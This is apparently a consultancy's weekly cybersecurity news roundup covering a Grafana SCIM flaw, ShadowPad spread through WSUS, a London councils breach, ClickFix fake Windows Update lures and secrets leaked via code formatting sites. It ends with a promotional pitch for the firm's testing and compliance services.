This Week in Cybersecurity: Looking Back at Week 48

This week’s intelligence confirms a surge in identity based exploitation and systemic operational risk.

We track a maximum severity flaw in Grafana SCIM (CVSS 10.0) and the deployment of ShadowPad malware via unpatched update servers, underscoring the danger of flawed privileged access.

Furthermore, the ClickFix social engineering attack that is leveraging a realistic, full screen Windows Update animation to trick users into running malware, and a major breach of London councils, reinforces that operational resilience and vendor security are paramount.

1. Maximum Severity Vulnerability & Exploitation

Maximum Severity Flaw in Grafana SCIM Component Patched

Grafana has released urgent security updates to address a maximum severity security flaw, tracked as CVE 2025 41115, which carries a CVSS score of 10.0.

The vulnerability resides in the System for Cross domain Identity Management (SCIM) component. This flaw allows a malicious client to override internal user IDs, potentially leading to user impersonation or privilege escalation (e.g., impersonating an Admin user).

Our Take: Identity Flaws are the New RCE.

A CVSS 10.0 flaw in an identity management component requires immediate action. This vulnerability highlights the extreme danger of flawed identity workflows. Our Penetration Testing and Vulnerability Assessments can help organisations verify the integrity of their SCIM and SSO implementations immediately.

ShadowPad Malware Actively Exploits WSUS Vulnerability for Full System Access

A recently patched security flaw in Microsoft Windows Server Update Services (WSUS) has been exploited by threat actors to distribute sophisticated malware known as ShadowPad. The attackers exploited a critical deserialisation flaw (CVE 2025 59287) to achieve remote code execution with system privileges.

ShadowPad, a modular backdoor often associated with Chinese state sponsored hacking groups, is launched using DLL side loading to ensure a memory resident execution that evades detection.

Our Take: Server RCE is Being Weaponised Rapidly.

The immediate exploitation of the WSUS flaw to distribute state sponsored malware underscores the urgency of patching update servers. If not patched, WSUS instances provide immediate, high level access to the core network environment.

2. Resilience & Operational Crisis

Major Cyber Attack Hits Multiple London Councils

Multiple London councils, including Kensington & Chelsea and Westminster City Council, which share IT systems, were struck by a serious cyber attack.

Officials confirmed the incident has the potential to compromise residents’ sensitive data, such as social care records and housing information. The councils invoked emergency plans and shut down several systems as a precaution, disrupting critical services.

Our Take: Public Sector Vulnerability is High Risk.

Attacks on local government expose extremely sensitive data. This case demonstrates the critical risk of shared infrastructure and the need for public sector entities to conduct stringent Third Party Assurance Assessments on all common IT providers.

Slovenia’s ELES Joins ENCS to Fortify Europe’s Power Grid Resilience

Slovenia’s state electricity transmission system operator, ELES, has joined the European Network for Cyber Security (ENCS) to strengthen continental defences against surging threats to the power grid. This collaboration is a strategic move to build cyber resilience in Europe’s critical energy infrastructure.

Our Take: OT Security is a Collective Defence.

This underscores the market wide trend of collective defence and intelligence sharing, which is crucial for managing systemic risk in critical sectors. Organisations must participate in relevant intelligence sharing networks (like ENCS) and ensure their OT security aligns with pan European standards.

3. Identity & Social Engineering

ClickFix Attack Hides Info Stealers Inside Fake Windows Update Screens

A highly deceptive variant of the ClickFix social engineering attack is leveraging a realistic, full screen Windows Update animation to trick users into running malware.

The attack convinces victims to press a specific key sequence, which automatically executes malicious commands in the Command Prompt. This multi stage process uses steganography to conceal the final malware payload, which consists of LummaC2 and Rhadamanthys information stealers, directly inside PNG images.

Our Take: Advanced Phishing Demands Advanced Training.

This level of deception requires immediate user training. Organisations must focus on monitoring for suspicious process chains and deploy Simulated Phishing Attacks that test for steganography based evasion and native system manipulation.

Microsoft FIDO2 Security Keys May Require PIN After Windows Update

Microsoft has warned users that FIDO2 security keys may now require a PIN during the sign in process after installing recent Windows updates. Microsoft states this is an intentional change to comply with WebAuthn specifications. Organisations and services can prevent mandatory PIN entry by configuring their WebAuthn settings to set user verification to “discouraged”.

Our Take: Identity Changes Require Planning.

While this is a compliance measure, it impacts user experience and internal help desks. Identity providers must be configured proactively, and administrators should ensure all SSO environments and FIDO2 policies are reviewed.

4. Insider, Supply Chain & Governance

Data Leak Crisis: Code Formatting Tools Expose Thousands of Enterprise Secrets

New research discovered that highly sensitive credentials were leaked via popular online tools like JSONFormatter and CodeBeautify. The sites’ public features exposed over 80,000 user pastes containing thousands of secrets, including Active Directory credentials and cloud environment keys, scraped by threat actors.

Our Take: Stop External Secret Exposure.

This is a critical security awareness failure. Implement strong technical controls and Third Party Assurance Assessments to prohibit pasting sensitive organizational code and credentials into untrusted external web services.

Hardening Identity and Securing Systemic Resilience

This week’s intelligence reveals that flawed identity controls (Grafana SCIM, FIDO2) and systemic vendor failure (London Councils breach) are the primary sources of critical operational risk. The consequence of these failures is direct and catastrophic, threatening public safety and resident data.

Secora Consulting’s specialised service pillars are explicitly designed to counter the advanced threats highlighted this week:

• Proactive Technical Validation: To ensure exploitation paths via identity and server flaws are eliminated, our Adversary Simulation Testing and Penetration Testing services stress test your live environment, targeting privileged access and zero day attack vectors like WSUS.

• Risk & Vulnerability Management: Our Vulnerability Assessments provide the technical clarity needed for effective remediation prioritisation (e.g., CVSS 10.0 flaws), while Cybersecurity Maturity Assessments establish a strategic roadmap for holistic defence.

• Compliance & Supply Chain Resilience: The London Councils breach underscore the need for assured processes. Our Third Party Assurance Assessments , combined with NIS2 Directive Consultancy, ISO 27001 Consultancy and PCI DSS Consultancy, ensure vendor and regulatory resilience.

• People & Process Resilience: The sophisticated ClickFix and BitB phishing techniques, along with insider threat risks, prove human error remains the primary attack vector. Our Simulated Phishing Attacks and Crisis Management Exercises transform your staff into an effective human firewall and ensure your executive team is prepared to respond legally and operationally during a major breach.

Security must be a layered, strategic function. Contact us today to strengthen your security architecture and turn these threats into actionable defence strategy. ⬇️